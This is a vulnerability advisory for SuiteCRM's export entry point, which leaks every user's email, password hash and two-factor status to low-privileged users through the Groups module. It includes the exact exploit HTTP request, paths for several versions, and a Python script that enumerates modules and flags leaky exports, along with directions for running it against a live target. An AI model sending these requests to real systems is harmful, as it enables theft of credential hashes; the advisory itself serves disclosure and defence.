The web application incorrectly returns sensitive data to authenticated, low-privileged users who request a data export from the ‘Groups’ module. The export includes, for every user account, the user’s email address, password hash and whether two-factor authentication is configured.
To export this information for all users on the application, the following request could be sent (version 8.3):
POST /legacy/index.php?entryPoint=export HTTP/1.1
Host: [APPLICATION_HOSTNAME]
Cookie: EmailGridWidths=0=10&1=10&2=150&3=250&4=175&5=125; ck_login_language_20=en_us; sugar_user_theme=suite8; sugar_user_theme=SuiteP; ck_login_id_20=2ed13b79-8c22-0f61-9511-64d0d6214ce7; ck_login_language_20=en_us; LEGACYSESSID=o67um0uqlvvbq090cq47ed84vi; PHPSESSID=ec351p8sg0sf51as5grrvc66kn; XSRF-TOKEN=8IkPTqHry3UFRIx_Sk47HIS2hnLvwvVr5jp_UVm79To; ck_login_id_20=f0950665-7c37-520f-9b61-64d2066e623e
Content-Length: 26
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: ""
Upgrade-Insecure-Requests: 1
Origin: [APPLICATION_HOSTNAME]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

module=Groups&action=index
The same attack works on versions 7.12.9 and 7.13.4 by sending the request to /index.php?entryPoint=export instead (the /legacy prefix only applies to the 8.x series).
The native intention of this functionality appears to be to allow users to export data from the tables of the module page they are viewing. The testing team enumerated all of the modules present in the application and sent a series of export requests, changing the value of the module parameter to each module identified. From our testing, it appears only the Groups module returns overly permissive data.
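The following script is an added example for this advisory, not SuiteCRM code or the testing team’s own tooling. It builds the export request shown above for each affected version line, and replays the module enumeration described in the previous paragraph against exported CSV text, flagging a module only when a password-hash or two-factor column appears (an email column on its own is normal for contact-style modules). The host name, session cookie, module list, CSV header names and sample exports are all constructed assumptions; only the entry-point paths and the module/action body are taken from the advisory.

```python
"""Check SuiteCRM 'export' responses for over-disclosed user-account fields.

Added example for this advisory, not SuiteCRM code. Host name, session cookie,
module list, header names and the CSV samples below are constructed; the
entry-point paths and the module/action body come from the advisory.
"""
import csv
import io
import urllib.parse
import urllib.request

# Export entry point per affected version line, as given in the advisory.
EXPORT_PATHS = {
    "8.3": "/legacy/index.php?entryPoint=export",
    "7.12.9": "/index.php?entryPoint=export",
    "7.13.4": "/index.php?entryPoint=export",
}

# Header fragments that indicate user-account data leaking into an export.
# Assumed names: the real export headers depend on the installation.
DECISIVE_MARKERS = ("hash", "two factor", "two_factor", "2fa", "totp")
CONTEXT_MARKERS = ("email",)  # legitimately present in many modules


def build_export_request(host, version, module, cookie):
    """Build the POST described in the advisory for a version and module."""
    path = EXPORT_PATHS[version]
    body = urllib.parse.urlencode({"module": module, "action": "index"}).encode()
    req = urllib.request.Request(f"https://{host}{path}", data=body, method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    req.add_header("Cookie", cookie)  # a low-privileged user's session
    return req


def sensitive_columns_in_export(csv_text):
    """Return the export's header names that match any sensitive marker."""
    header = next(csv.reader(io.StringIO(csv_text)), [])
    hits = []
    for col in header:
        name = col.strip().lower()
        if any(m in name for m in DECISIVE_MARKERS + CONTEXT_MARKERS):
            hits.append(name)
    return sorted(hits)


def is_over_permissive(csv_text):
    """Flag only if a hash or two-factor column is present; email alone is
    expected in modules such as Contacts and is not by itself a finding."""
    return any(
        any(m in col for m in DECISIVE_MARKERS)
        for col in sensitive_columns_in_export(csv_text)
    )


def find_leaky_modules(fetch_export, modules):
    """Replay the advisory's enumeration: export every module and keep those
    whose CSV exposes user-account fields. fetch_export(module) -> CSV text."""
    leaky = {}
    for module in modules:
        text = fetch_export(module)
        if is_over_permissive(text):
            leaky[module] = sensitive_columns_in_export(text)
    return leaky


# Constructed sample exports standing in for live responses.
SAMPLE_EXPORTS = {
    "Accounts": '"ID","Name","Phone"\n"1","ACME","555-0100"\n',
    "Contacts": '"ID","First Name","Email"\n"2","Ann","ann@example.com"\n',
    "Groups": ('"ID","User Name","Email","User Hash","Two Factor Auth"\n'
               '"3","bob","bob@example.com","$2y$10$constructedhash","1"\n'),
}


def demo():
    """Run the enumeration over the constructed samples (offline)."""
    return find_leaky_modules(SAMPLE_EXPORTS.__getitem__, sorted(SAMPLE_EXPORTS))


if __name__ == "__main__":
    print(demo())
```

Against a live target, replace `SAMPLE_EXPORTS.__getitem__` with a function that sends `build_export_request(...)` through `urllib.request.urlopen` and returns the decoded body; the marker lists should be adjusted to the column headers the installation actually emits.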